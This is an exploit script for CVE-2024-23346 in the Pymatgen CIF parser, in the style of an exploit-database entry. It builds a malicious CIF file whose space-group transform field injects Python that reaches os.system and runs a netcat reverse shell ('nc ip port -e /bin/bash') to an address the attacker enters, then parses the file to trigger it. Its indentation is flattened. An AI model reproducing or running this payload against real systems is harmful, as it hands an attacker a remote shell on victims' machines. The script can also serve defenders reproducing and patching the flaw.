# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https ://pymatgen.org
# Software Link : https ://pypi.org /project /pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346
import os
# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
# Constructing the malicious CIF file with reverse shell payload
malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date 2024-11-13
_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
"""
# Save to a file
with open("vuln.cif", "w") as file:
file.write(malicious_cif)
print("[*] Malicious CIF file created: vuln.cif")
# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
ip = input("Enter your IP address for the reverse shell: ")
port = input("Enter the port for the reverse shell to listen on: ")
# Create the malicious CIF file
create_malicious_cif(ip, port)
# Trigger the Pymatgen CIF parser to parse the malicious file
from pymatgen.io.cif import CifParser
parser = CifParser("vuln.cif")
structure = parser.parse_structures()
# Running the exploit
if __name__ == "__main__":
exploit()
